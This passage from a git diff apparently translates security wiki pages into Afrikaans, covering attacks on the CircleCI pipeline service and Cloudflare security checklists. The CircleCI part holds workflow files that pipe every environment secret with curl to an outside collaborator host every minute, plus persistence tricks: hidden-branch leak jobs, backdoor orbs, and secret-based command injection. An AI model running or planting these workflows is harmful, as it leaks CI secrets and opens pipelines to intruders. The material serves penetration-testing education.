wat **die geheime na 'n eksterne adres uitvoer**: ```yaml version: 2.1 jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- run: +name: "Exfil env" +command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" # I filter by the repo branch where this config.yaml file is located: circleci-project-setup workflows: - exfil-env-workflow: - triggers: - - schedule: - cron: "* * * * *" - filters: - branches: - only: - - circleci-project-setup - jobs: - - exfil-env +exfil-env-workflow: +triggers: +- schedule: +cron: "* * * * *" +filters: +branches: +only: +- circleci-project-setup +jobs: +- exfil-env ``` +#### Exfiltreer Konteks Geheime -#### Exfiltrate Context Secrets - -You need to **specify the context name** (this will also exfiltrate the project secrets): - +Jy moet **die konteksnaam spesifiseer** (dit sal ook die projekgeheime eksfiltreer): ```yaml version: 2.1 jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "env | base64" +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- run: +name: "Exfil env" +command: "env | base64" workflows: - exfil-env-workflow: - jobs: - - exfil-env: - context: Test-Context +exfil-env-workflow: +jobs: +- exfil-env: +context: Test-Context ``` - -If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **modify a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**: - +As jy **nie toegang tot die webkonsol** het nie, maar jy het **toegang tot die repo** en jy weet dat CircleCI gebruik word, kan jy net **'n werksvloei aanpas** wat **elke minuut geaktiveer word** en wat **die 
geheime na 'n eksterne adres stuur**: ```yaml version: 2.1 jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- run: +name: "Exfil env" +command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" # I filter by the repo branch where this config.yaml file is located: circleci-project-setup workflows: - exfil-env-workflow: - triggers: - - schedule: - cron: "* * * * *" - filters: - branches: - only: - - circleci-project-setup - jobs: - - exfil-env: - context: Test-Context +exfil-env-workflow: +triggers: +- schedule: +cron: "* * * * *" +filters: +branches: +only: +- circleci-project-setup +jobs: +- exfil-env: +context: Test-Context ``` - > [!WARNING] -> Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**. +> Om net 'n nuwe `.circleci/config.yml` in 'n repo te skep **is nie genoeg om 'n circleci bou te aktiveer nie**. Jy moet dit **as 'n projek in die circleci konsole aktiveer**. -#### Escape to Cloud +#### Ontsnap na die Wolk -**CircleCI** gives you the option to run **your builds in their machines or in your own**.\ -By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**. 
- -Notice that in the previous examples it was launched everything inside a docker container, but you can also **ask to launch a VM machine** (which may have different cloud permissions): +**CircleCI** gee jou die opsie om **jou boue in hul masjiene of in jou eie** te laat loop.\ +Standaard is hul masjiene geleĂ« in GCP, en jy sal aanvanklik nie enigiets relevants kan vind nie. As 'n slagoffer egter die take in **hulle eie masjiene (potensieel, in 'n wolk omgewing)** uitvoer, kan jy 'n **wolk metadata eindpunt met interessante inligting daarop** vind. +Let daarop dat in die vorige voorbeelde alles binne 'n docker houer gelanseer is, maar jy kan ook **vra om 'n VM masjien te lanseer** (wat dalk verskillende wolk toestemmings kan hĂȘ): ```yaml jobs: - exfil-env: - #docker: - # - image: cimg/base:stable - machine: - image: ubuntu-2004:current +exfil-env: +#docker: +# - image: cimg/base:stable +machine: +image: ubuntu-2004:current ``` - -Or even a docker container with access to a remote docker service: - +Of selfs 'n docker-container met toegang tot 'n afstands-docker-diens: ```yaml jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - setup_remote_docker: - version: 19.03.13 +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- setup_remote_docker: +version: 19.03.13 ``` +#### Volharding -#### Persistence - -- It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access. - - _https://app.circleci.com/settings/user/tokens_ -- It's possible to **create projects tokens** to access the project with the permissions given to the token. - - _https://app.circleci.com/settings/project/github/\/\/api_ -- It's possible to **add SSH keys** to the projects. - - _https://app.circleci.com/settings/project/github/\/\/ssh_ -- It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday. 
- - Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday. -- If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor** -- You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value +- Dit is moontlik om **gebruikertokens in CircleCI** te **skep** om toegang te verkry tot die API-eindpunte met die gebruikers se toegang. +- _https://app.circleci.com/settings/user/tokens_ +- Dit is moontlik om **projektokens** te **skep** om toegang te verkry tot die projek met die toestemmings wat aan die token gegee is. +- _https://app.circleci.com/settings/project/github/\/\/api_ +- Dit is moontlik om **SSH-sleutels** aan die projekte toe te voeg. +- _https://app.circleci.com/settings/project/github/\/\/ssh_ +- Dit is moontlik om 'n **cron-taak in 'n verborge tak** te **skep** in 'n onverwagte projek wat elke dag al die **context env** vars **lek**. +- Of selfs in 'n tak te **skep** / 'n bekende taak te **wysig** wat elke dag al die context en **projeksecrets** sal **lek**. +- As jy 'n github-eienaar is, kan jy **ongeverifieerde orbs** **toelaat** en een in 'n taak as **achterdeur** konfigureer. +- Jy kan 'n **opdraginjektievulnerabiliteit** in sommige take vind en **opdragte** via 'n **geheim** **injekteer** deur sy waarde te **wysig**. {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/cloudflare-security/README.md b/src/pentesting-ci-cd/cloudflare-security/README.md index 77d2c2c50..2771189de 100644 --- a/src/pentesting-ci-cd/cloudflare-security/README.md +++ b/src/pentesting-ci-cd/cloudflare-security/README.md 
@@ -2,76 +2,76 @@ {{#include ../../banners/hacktricks-training.md}} -In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** +In 'n Cloudflare-rekening is daar 'n paar **generale instellings en dienste** wat gekonfigureer kan word. Op hierdie bladsy gaan ons die **veiligheid-verwante instellings van elke afdeling analiseer:**
## Websites -Review each with: +Herbekyk elkeen met: {{#ref}} cloudflare-domains.md {{#endref}} -### Domain Registration +### Domein Registrasie -- [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain. +- [ ] In **`Transfer Domains`** kyk dat dit nie moontlik is om enige domein oor te dra nie. -Review each with: +Herbekyk elkeen met: {{#ref}} cloudflare-domains.md {{#endref}} -## Analytics +## Analise -_I couldn't find anything to check for a config security review._ +_Ek kon niks vind om 'n konfigurasie veiligheid hersiening te doen nie._ -## Pages +## Bladsye -On each Cloudflare's page: +Op elke Cloudflare se bladsy: -- [ ] Check for **sensitive information** in the **`Build log`**. -- [ ] Check for **sensitive information** in the **Github repository** assigned to the pages. -- [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/). -- [ ] Check for **vulnerable functions** in the `/fuctions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any). -- [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** if you can **access the code** -- [ ] In the details of each page `//pages/view/blocklist/settings/functions`. Check for **sensitive information** in the **`Environment variables`**. -- [ ] In the details page check also the **build command** and **root directory** for **potential injections** to compromise the page. +- [ ] Kyk vir **sensitiewe inligting** in die **`Build log`**. +- [ ] Kyk vir **sensitiewe inligting** in die **Github-repo** wat aan die bladsye toegeken is. +- [ ] Kyk vir potensiĂ«le github repo kompromie via **workflow command injection** of `pull_request_target` kompromie. Meer inligting in die [**Github Veiligheid bladsy**](../github-security/). 
+- [ ] Kyk vir **kwesbare funksies** in die `/fuctions` gids (indien enige), kyk die **omleidings** in die `_redirects` lĂȘer (indien enige) en **misgeconfigureerde koppe** in die `_headers` lĂȘer (indien enige). +- [ ] Kyk vir **kwesbaarhede** in die **web bladsy** via **blackbox** of **whitebox** as jy die **kode** kan **toegang**. +- [ ] In die besonderhede van elke bladsy `//pages/view/blocklist/settings/functions`. Kyk vir **sensitiewe inligting** in die **`Environment variables`**. +- [ ] In die besonderhede bladsy kyk ook die **bou opdrag** en **wortel gids** vir **potensiĂ«le inspuitings** om die bladsy te kompromitteer. ## **Workers** -On each Cloudflare's worker check: +Op elke Cloudflare se werker kyk: -- [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker? -- [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information** -- [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input) - - Check for SSRFs returning the indicated page that you can control - - Check XSSs executing JS inside a svg image - - It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input. +- [ ] Die triggers: Wat maak die werker om te trigger? Kan 'n **gebruiker data stuur** wat deur die werker **gebruik** sal word? +- [ ] In die **`Settings`**, kyk vir **`Variables`** wat **sensitiewe inligting** bevat. +- [ ] Kyk die **kode van die werker** en soek vir **kwesbaarhede** (veral in plekke waar die gebruiker die invoer kan bestuur). +- Kyk vir SSRFs wat die aangeduide bladsy teruggee wat jy kan beheer. +- Kyk vir XSS's wat JS binne 'n svg beeld uitvoer. 
+- Dit is moontlik dat die werker met ander interne dienste interaksie het. Byvoorbeeld, 'n werker kan met 'n R2-bucket interaksie hĂȘ wat inligting daarin stoor wat van die invoer verkry is. In daardie geval sal dit nodig wees om te kyk watter vermoĂ«ns die werker oor die R2-bucket het en hoe dit misbruik kan word vanaf die gebruikersinvoer. > [!WARNING] -> Note that by default a **Worker is given a URL** such as `..workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it. +> Let daarop dat 'n **Werker standaard 'n URL gegee word** soos `..workers.dev`. Die gebruiker kan dit op 'n **subdomein** stel, maar jy kan dit altyd met daardie **oorspronklike URL** toegang as jy dit weet. ## R2 -On each R2 bucket check: +Op elke R2-bucket kyk: -- [ ] Configure **CORS Policy**. +- [ ] Konfigureer **CORS-beleid**. -## Stream +## Stroom TODO -## Images +## Beelde TODO -## Security Center +## Veiligheid Sentrum -- [ ] If possible, run a **`Security Insights`** **scan** and an **`Infrastructure`** **scan**, as they will **highlight** interesting information **security** wise. -- [ ] Just **check this information** for security misconfigurations and interesting info +- [ ] As moontlik, voer 'n **`Security Insights`** **skandering** en 'n **`Infrastructure`** **skandering** uit, aangesien dit **interessante inligting** **veiligheid** wys. +- [ ] Kyk net na **hierdie inligting** vir veiligheid misconfigurasies en interessante inligting. ## Turnstile 
@@ -83,56 +83,52 @@ TODO cloudflare-zero-trust-network.md {{#endref}} -## Bulk Redirects +## Groot Omleidings > [!NOTE] -> Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static — they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior. +> Anders as [Dinamiese Omleidings](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Groot Omleidings**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) is essensieel staties — hulle ondersteun **nie enige string vervangings** operasies of gereelde uitdrukkings nie. Dit is egter moontlik om URL omleidingsparameters te konfigureer wat hul URL ooreenkoms gedrag en hul runtime gedrag beĂŻnvloed. -- [ ] Check that the **expressions** and **requirements** for redirects **make sense**. -- [ ] Check also for **sensitive hidden endpoints** that you contain interesting info. +- [ ] Kyk dat die **uitdrukkings** en **vereistes** vir omleidings **sinvol is**. +- [ ] Kyk ook vir **sensitiewe verborge eindpunte** wat jy interessante inligting bevat. 
-## Notifications +## Kennisgewings -- [ ] Check the **notifications.** These notifications are recommended for security: - - `Usage Based Billing` - - `HTTP DDoS Attack Alert` - - `Layer 3/4 DDoS Attack Alert` - - `Advanced HTTP DDoS Attack Alert` - - `Advanced Layer 3/4 DDoS Attack Alert` - - `Flow-based Monitoring: Volumetric Attack` - - `Route Leak Detection Alert` - - `Access mTLS Certificate Expiration Alert` - - `SSL for SaaS Custom Hostnames Alert` - - `Universal SSL Alert` - - `Script Monitor New Code Change Detection Alert` - - `Script Monitor New Domain Alert` - - `Script Monitor New Malicious Domain Alert` - - `Script Monitor New Malicious Script Alert` - - `Script Monitor New Malicious URL Alert` - - `Script Monitor New Scripts Alert` - - `Script Monitor New Script Exceeds Max URL Length Alert` - - `Advanced Security Events Alert` - - `Security Events Alert` -- [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. Make also sure webhook urls use **HTTPS** - - [ ] As extra check, you could try to **impersonate a cloudflare notification** to a third party, maybe you can somehow **inject something dangerous** +- [ ] Kyk die **kennisgewings.** Hierdie kennisgewings word aanbeveel vir veiligheid: +- `Usage Based Billing` +- `HTTP DDoS Attack Alert` +- `Layer 3/4 DDoS Attack Alert` +- `Advanced HTTP DDoS Attack Alert` +- `Advanced Layer 3/4 DDoS Attack Alert` +- `Flow-based Monitoring: Volumetric Attack` +- `Route Leak Detection Alert` +- `Access mTLS Certificate Expiration Alert` +- `SSL for SaaS Custom Hostnames Alert` +- `Universal SSL Alert` +- `Script Monitor New Code Change Detection Alert` +- `Script Monitor New Domain Alert` +- `Script Monitor New Malicious Domain Alert` +- `Script Monitor New Malicious Script Alert` +- `Script Monitor New Malicious URL Alert` +- `Script Monitor New Scripts Alert` +- `Script Monitor New Script Exceeds Max URL Length Alert` +- `Advanced Security Events Alert` +- 
`Security Events Alert` +- [ ] Kyk al die **bestemmings**, aangesien daar **sensitiewe inligting** (basiese http auth) in webhook urls kan wees. Maak ook seker dat webhook urls **HTTPS** gebruik. +- [ ] As ekstra kontrole, kan jy probeer om 'n **cloudflare kennisgewing** na 'n derde party te **verpersoonlik**, miskien kan jy op een of ander manier **iets gevaarliks inspuit**. -## Manage Account +## Bestuur Rekening -- [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**. -- [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**. -- [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle. - - Therefore, whenever possible is **recommended** to use the **Enterprise plan**. -- [ ] In Members it's possible to check which **members** has **2FA enabled**. **Every** user should have it enabled. +- [ ] Dit is moontlik om die **laaste 4 syfers van die kredietkaart**, **verval** tyd en **faktuur adres** in **`Billing` -> `Payment info`** te sien. +- [ ] Dit is moontlik om die **plan tipe** wat in die rekening gebruik word in **`Billing` -> `Subscriptions`** te sien. +- [ ] In **`Members`** is dit moontlik om al die lede van die rekening en hul **rol** te sien. Let daarop dat as die plan tipe nie Enterprise is nie, bestaan daar slegs 2 rolle: Administrateur en Super Administrateur. Maar as die gebruikte **plan Enterprise** is, kan [**meer rolle**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) gebruik word om die minste voorregte beginsel te volg. 
+- Daarom, wanneer moontlik, is dit **aanbeveel** om die **Enterprise plan** te gebruik. +- [ ] In Lede is dit moontlik om te kyk watter **lede** **2FA geaktiveer** het. **Elke** gebruiker moet dit geaktiveer hĂȘ. > [!NOTE] -> Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members) +> Let daarop dat gelukkig die rol **`Administrator`** nie toestemming gee om lidmaatskappe te bestuur nie (**kan nie voorregte verhoog of nuwe lede nooi nie**). -## DDoS Investigation +## DDoS Ondersoek -[Check this part](cloudflare-domains.md#cloudflare-ddos-protection). +[Kyk hierdie deel](cloudflare-domains.md#cloudflare-ddos-protection). {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md index 02989e685..9fe9235b9 100644 --- a/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md +++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md @@ -2,31 +2,31 @@ {{#include ../../banners/hacktricks-training.md}} -In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** +In elke TLD wat in Cloudflare gekonfigureer is, is daar 'n paar **algemene instellings en dienste** wat gekonfigureer kan word. Op hierdie bladsy gaan ons die **veiligheidsverwante instellings van elke afdeling analiseer:**
-### Overview +### Oorsig -- [ ] Get a feeling of **how much** are the services of the account **used** -- [ ] Find also the **zone ID** and the **account ID** +- [ ] Kry 'n gevoel van **hoeveel** die dienste van die rekening **gebruik** word +- [ ] Vind ook die **zone ID** en die **rekening ID** -### Analytics +### Analise -- [ ] In **`Security`** check if there is any **Rate limiting** +- [ ] In **`Security`** kyk of daar enige **Tarief beperking** is ### DNS -- [ ] Check **interesting** (sensitive?) data in DNS **records** -- [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domin.com) -- [ ] Check for web pages that **aren't** **proxied** -- [ ] Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address -- [ ] Check that **DNSSEC** is **enabled** -- [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs** - - This is could be useful to **hide subdomain takeover vulnerabilities** and improve load timings -- [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing) +- [ ] Kyk na **interessante** (sensitiewe?) data in DNS **rekords** +- [ ] Kyk vir **subdomeine** wat **sensitiewe inligting** kan bevat net gebaseer op die **naam** (soos admin173865324.domin.com) +- [ ] Kyk vir webbladsye wat **nie** **geproksie** is nie +- [ ] Kyk vir **geproksie webbladsye** wat direk deur CNAME of IP adres **toeganklik** is +- [ ] Kyk dat **DNSSEC** **geaktiveer** is +- [ ] Kyk dat **CNAME Flattening** in **alle CNAMEs** **gebruik** word +- Dit kan nuttig wees om **subdomein oorneem kwesbaarhede** te **versteek** en laai tyds te verbeter +- [ ] Kyk dat die domeine [**nie kwesbaar is vir spoofing nie**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing) -### **Email** +### **E-pos** TODO 
@@ -36,82 +36,82 @@ TODO ### SSL/TLS -#### **Overview** +#### **Oorsig** -- [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point. -- [ ] The **SSL/TLS Recommender** should be enabled +- [ ] Die **SSL/TLS enkripsie** moet **Vol** of **Vol (Streng)** wees. Enige ander sal **duidelike teks verkeer** op 'n sekere punt stuur. +- [ ] Die **SSL/TLS Aanbeveler** moet geaktiveer wees -#### Edge Certificates +#### Rand Sertifikate -- [ ] **Always Use HTTPS** should be **enabled** -- [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled** -- [ ] **Minimum TLS Version should be 1.2** -- [ ] **TLS 1.3 should be enabled** -- [ ] **Automatic HTTPS Rewrites** should be **enabled** -- [ ] **Certificate Transparency Monitoring** should be **enabled** +- [ ] **Gebruik altyd HTTPS** moet **geaktiveer** wees +- [ ] **HTTP Streng Vervoer Sekuriteit (HSTS)** moet **geaktiveer** wees +- [ ] **Minimum TLS Weergawe moet 1.2 wees** +- [ ] **TLS 1.3 moet geaktiveer wees** +- [ ] **Outomatiese HTTPS Herskrywings** moet **geaktiveer** wees +- [ ] **Sertifikaat Deursigtigheid Monitering** moet **geaktiveer** wees -### **Security** +### **Veiligheid** -- [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses. - - The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used. 
-- [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used -- [ ] In the **`API Shield`** section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare -- [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections** -- [ ] In the **`Settings`** section: - - [ ] Check that the **`Security Level`** is **medium** or greater - - [ ] Check that the **`Challenge Passage`** is 1 hour at max - - [ ] Check that the **`Browser Integrity Check`** is **enabled** - - [ ] Check that the **`Privacy Pass Support`** is **enabled** +- [ ] In die **`WAF`** afdeling is dit interessant om te kyk dat **Firewall** en **tarief beperking reëls gebruik word** om misbruik te voorkom. +- Die **`Bypass`** aksie sal **Cloudflare sekuriteit** funksies vir 'n versoek **deaktiveer**. Dit moet nie gebruik word nie. +- [ ] In die **`Page Shield`** afdeling word dit aanbeveel om te kyk dat dit **geaktiveer** is as enige bladsy gebruik word +- [ ] In die **`API Shield`** afdeling word dit aanbeveel om te kyk dat dit **geaktiveer** is as enige API in Cloudflare blootgestel word +- [ ] In die **`DDoS`** afdeling word dit aanbeveel om die **DDoS beskermings** te aktiveer +- [ ] In die **`Instellings`** afdeling: +- [ ] Kyk dat die **`Veiligheidsvlak`** **medium** of groter is +- [ ] Kyk dat die **`Uitdaging Deurgang`** 1 uur maksimum is +- [ ] Kyk dat die **`Bladsy Integriteit Kontrole`** **geaktiveer** is +- [ ] Kyk dat die **`Privaatheid Pas Ondersteuning`** **geaktiveer** is -#### **CloudFlare DDoS Protection** +#### **CloudFlare DDoS Beskerming** -- If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access. 
-- In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie. - - If the attack is from a **verified bot**, at least **add a rate limit** to bots. - - If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path. - - You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF. - - Check if **Managed rules** could also help to prevent vulnerability exploitations. - - In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents.** -- In DDoS you could **override some rules to make them more restrictive**. -- **Settings**: Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**. -- In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled -- In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events** +- As jy kan, aktiveer **Bot Strijd Modus** of **Super Bot Strijd Modus**. As jy 'n API beskerm wat programmaties toeganklik is (van 'n JS front end bladsy byvoorbeeld). Jy mag dalk nie in staat wees om dit te aktiveer sonder om daardie toegang te breek nie. +- In **WAF**: Jy kan **tarief beperkings per URL pad** of vir **geverifieerde bots** (Tarief beperking reëls) skep, of om **toegang te blokkeer** gebaseer op IP, Koekie, verwysing...). So jy kan versoeke blokkeer wat nie van 'n webblad kom nie of 'n koekie het. +- As die aanval van 'n **geverifieerde bot** is, voeg ten minste 'n **tarief beperking** by vir bots. +- As die aanval op 'n **spesifieke pad** is, voeg as voorkomingsmeganisme 'n **tarief beperking** in hierdie pad by. +- Jy kan ook **witlys** IP adresse, IP reekse, lande of ASN's van die **Gereedskap** in WAF. 
+- Kyk of **Geverifieerde reëls** ook kan help om kwesbaarheidsontploffings te voorkom. +- In die **Gereedskap** afdeling kan jy **blokkeer of 'n uitdaging gee aan spesifieke IPs** en **gebruikersagente.** +- In DDoS kan jy **sekere reëls oorskry om hulle meer beperkend te maak**. +- **Instellings**: Stel **Veiligheidsvlak** op **Hoog** en op **Onder Aanval** as jy Onder Aanval is en dat die **Bladsy Integriteit Kontrole geaktiveer** is. +- In Cloudflare Domeine -> Analise -> Veiligheid -> Kyk of **tarief beperking** geaktiveer is +- In Cloudflare Domeine -> Veiligheid -> Gebeure -> Kyk vir **gedetekteerde kwaadwillige Gebeure** -### Access +### Toegang {{#ref}} cloudflare-zero-trust-network.md {{#endref}} -### Speed +### Spoed -_I couldn't find any option related to security_ +_Ek kon nie enige opsie rakende veiligheid vind nie_ ### Caching -- [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool** +- [ ] In die **`Konfigurasie`** afdeling oorweeg om die **CSAM Skandeer Gereedskap** te aktiveer ### **Workers Routes** -_You should have already checked_ [_cloudflare workers_](./#workers) +_Jy moet reeds_ [_cloudflare workers_](./#workers) _gekyk het_ -### Rules +### Reëls TODO -### Network +### Netwerk -- [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled** -- [ ] **`HTTP/3 (with QUIC)`** should be **enabled** -- [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled** +- [ ] As **`HTTP/2`** **geaktiveer** is, moet **`HTTP/2 na Oorsprong`** **geaktiveer** wees +- [ ] **`HTTP/3 (met QUIC)`** moet **geaktiveer** wees +- [ ] As die **privaatheid** van jou **gebruikers** belangrik is, maak seker **`Onion Routing`** is **geaktiveer** -### **Traffic** +### **Verkeer** TODO -### Custom Pages +### Aangepaste Bladsye -- [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode) +- [ ] Dit is 
opsioneel om aangepaste bladsye te konfigureer wanneer 'n fout rakende veiligheid geaktiveer word (soos 'n blok, tarief beperking of ek is onder aanval modus) ### Apps @@ -119,8 +119,8 @@ TODO ### Scrape Shield -- [ ] Check **Email Address Obfuscation** is **enabled** -- [ ] Check **Server-side Excludes** is **enabled** +- [ ] Kyk of **E-pos Adres Obfuskering** **geaktiveer** is +- [ ] Kyk of **Bediener-kant Uitsluitings** **geaktiveer** is ### **Zaraz** @@ -131,7 +131,3 @@ TODO TODO {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md index 491ae7bc1..48d438b91 100644 --- a/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md +++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md @@ -2,43 +2,43 @@ {{#include ../../banners/hacktricks-training.md}} -In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** +In 'n **Cloudflare Zero Trust Network** rekening is daar 'n paar **instellings en dienste** wat gekonfigureer kan word. Op hierdie bladsy gaan ons die **veiligheidsverwante instellings van elke afdeling analiseer:**
### Analytics -- [ ] Useful to **get to know the environment** +- [ ] Nuttig om **die omgewing te leer ken** ### **Gateway** -- [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications. - - If used, **policies** could be created to **restrict** the access to malicious sites. - - This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies. +- [ ] In **`Policies`** is dit moontlik om beleide te genereer om te **beperk** deur **DNS**, **netwerk** of **HTTP** versoek wie toegang tot toepassings kan hĂȘ. +- As gebruik, kan **beleide** geskep word om die toegang tot kwaadwillige webwerwe te **beperk**. +- Dit is **slegs relevant as 'n gateway gebruik word**, indien nie, is daar geen rede om defensiewe beleide te skep nie. ### Access #### Applications -On each application: +Op elke toepassing: -- [ ] Check **who** can access to the application in the **Policies** and check that **only** the **users** that **need access** to the application can access. - - To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also) -- [ ] Check the **available identity providers** and make sure they **aren't too open** +- [ ] Kontroleer **wie** toegang tot die toepassing kan hĂȘ in die **Policies** en maak seker dat **slegs** die **gebruikers** wat **toegang nodig het** tot die toepassing toegang kan hĂȘ. +- Om toegang toe te laat, gaan **`Access Groups`** gebruik word (en **addisionele reĂ«ls** kan ook gestel word) +- [ ] Kontroleer die **beskikbare identiteitsverskaffers** en maak seker hulle **is nie te oop nie** - [ ] In **`Settings`**: - - [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything) - - [ ] Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP. 
- - [ ] Consider enabling also **Browser rendering** for better **protection. More info about** [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.** +- [ ] Kontroleer dat **CORS nie geaktiveer is nie** (as dit geaktiveer is, kontroleer dat dit **veilig** is en nie alles toelaat nie) +- [ ] Koekies moet die **Streng Same-Site** attribuut hĂȘ, **HTTP Only** en **binding cookie** moet **geaktiveer** wees as die toepassing HTTP is. +- [ ] Oorweeg om ook **Bladsy-rendering** te aktiveer vir beter **beskerming. Meer inligting oor** [**afgeleĂ« blaaier-isolasie hier**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.** #### **Access Groups** -- [ ] Check that the access groups generated are **correctly restricted** to the users they should allow. -- [ ] It's specially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**. - - Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary. +- [ ] Kontroleer dat die toegangsgroepe wat gegenereer is **korrek beperk** is tot die gebruikers wat hulle moet toelaat. +- [ ] Dit is veral belangrik om te kontroleer dat die **standaard toegangsgroep nie te oop is nie** (dit **laat nie te veel mense toe nie**) aangesien **standaard** enige iemand in daardie **groep** toegang tot **toepassings** gaan hĂȘ. +- Let daarop dat dit moontlik is om **toegang** 